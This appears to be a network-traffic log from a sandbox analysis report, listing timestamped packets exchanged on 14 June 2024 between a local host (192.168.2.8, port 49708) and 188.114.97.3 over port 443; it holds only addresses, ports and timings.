Jun 14, 2024 15:15:07.766180038 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.766268015 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766292095 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766344070 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.766350985 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766397953 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.766560078 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766582966 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766634941 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.766644001 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766695976 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.766720057 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766741037 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766793013 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.766801119 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.766841888 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.767215014 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.767237902 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.767302036 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.767308950 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.767327070 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.767344952 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.767375946 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.767384052 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.767399073 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.767440081 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.767637014 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.767652988 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.767712116 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.767720938 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.767764091 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.768085003 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768106937 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768158913 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768194914 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.768203974 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768229008 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.768384933 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768399000 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768445969 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.768454075 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768718004 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768733978 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768780947 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.768790960 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768811941 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.768918991 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768933058 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.768974066 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.768980980 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.769009113 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.769145966 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.769162893 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.769222021 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.769232035 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.769648075 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.769660950 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.769710064 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.769717932 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.769728899 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.769748926 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.769766092 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.769797087 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.769804955 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.769829035 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.770416975 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.770430088 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.770490885 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.770498991 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.770564079 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.770581007 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.770618916 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.770627975 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.770652056 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.770682096 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.770695925 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.770736933 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.770745993 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.770770073 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.770987988 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771004915 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771044016 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.771054029 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771064043 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.771070957 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771084070 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771126986 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.771136999 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771151066 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.771223068 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771240950 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771276951 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.771285057 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771296024 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.771461010 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771473885 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.771523952 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.771533012 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.806626081 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.806649923 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.806718111 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.806735039 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.806766033 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.849152088 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.881642103 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.881692886 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.881783962 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.881808996 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.881823063 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.881858110 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.881896973 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.881938934 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.881959915 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.881964922 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.881983042 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.882005930 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.882133007 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.882149935 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.882210970 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.882215977 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.882255077 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.882355928 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.882373095 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.882455111 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.882460117 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.882505894 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.882565975 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.882581949 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.882638931 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.882643938 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.882683992 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884311914 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884331942 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884401083 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884409904 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884418964 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884438038 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884453058 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884506941 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884515047 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884526014 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884552002 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884557009 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884567976 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884587049 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884588957 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884613037 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884627104 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884634018 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884644032 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884669065 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884676933 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884685040 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884706020 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884711981 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884733915 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884743929 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884751081 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884785891 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884792089 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884820938 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884835958 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884850979 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884851933 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884865046 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884890079 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884927988 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884928942 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884938955 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884958029 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.884988070 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.884994984 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885004044 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885020018 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885023117 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885040045 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885046959 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885078907 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885082960 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885101080 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885107994 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885114908 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885139942 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885164976 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885176897 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885179043 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885198116 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885221004 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885245085 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885260105 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885273933 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885322094 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885329008 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885335922 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885351896 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885382891 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885384083 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885395050 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885415077 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885415077 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885435104 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885440111 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885449886 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885459900 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885469913 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885481119 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885499954 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885505915 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885523081 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885529041 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885540962 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885551929 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885556936 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885591030 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885605097 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885620117 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885626078 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885643959 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885658979 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885680914 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885687113 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885695934 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885709047 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885709047 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885744095 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885750055 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885761976 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885787964 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885795116 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885801077 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885818005 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885847092 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885847092 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885858059 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885874033 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885878086 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885905027 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885910034 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885932922 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885945082 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885951996 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.885958910 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.885974884 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886003971 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886034012 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886039019 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886085033 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886135101 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886153936 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886188984 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886194944 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886224985 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886245012 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886262894 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886276960 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886341095 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886348009 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886383057 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886401892 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886512041 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886526108 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886581898 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886588097 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886629105 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886631012 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886640072 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886657953 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886688948 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886696100 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886720896 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886742115 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886876106 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886888981 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.886949062 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.886955976 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887005091 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887012959 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887026072 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887077093 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887084961 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887131929 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887221098 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887233973 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887301922 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887309074 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887356997 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887387037 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887399912 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887442112 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887448072 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887475967 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887495041 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887586117 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887598991 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887804031 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887810946 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887877941 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887882948 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887892008 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887921095 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.887938976 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887978077 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.887985945 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888000011 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888014078 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888026953 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888032913 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888061047 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888086081 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888123989 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888138056 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888179064 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888186932 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888227940 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888361931 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888376951 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888427019 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888433933 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888473034 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888580084 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888595104 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888638020 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888645887 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888663054 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888686895 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888720036 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888734102 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888787031 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888796091 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888837099 CEST	49708	443	192.168.2.8	188.114.97.3
Jun 14, 2024 15:15:07.888890982 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888906002 CEST	443	49708	188.114.97.3	192.168.2.8
Jun 14, 2024 15:15:07.888957977 CEST	49708	443	192.168.2.8	188.114.97.3
